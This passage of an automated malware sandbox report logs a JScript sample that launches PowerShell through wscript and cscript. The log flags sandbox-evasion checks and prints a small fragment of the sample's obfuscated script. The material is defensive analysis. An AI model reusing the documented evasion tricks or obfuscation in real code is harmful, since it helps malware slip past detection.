          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Potential evasive JS / VBS script found (domain check)
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: USERDOMAIN%\\%|iteWr|etFileG|RunEx|ript.ShellWSc|tingsset|leStartWhenAvailab|rectoryWorkingDi|floor|pSlee|LogonTriggerId|twscrip";FRWMh = HQgORQZ.split("|");XYNcro = FRWMh[RuamKJ];for (var akvCX = 0;
          Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4625Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5238Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5994Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3810Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160Thread sleep count: 4625 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160Thread sleep count: 5238 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268Thread sleep count: 5994 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268Thread sleep count: 3810 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"Jump to behavior
          Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
          Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
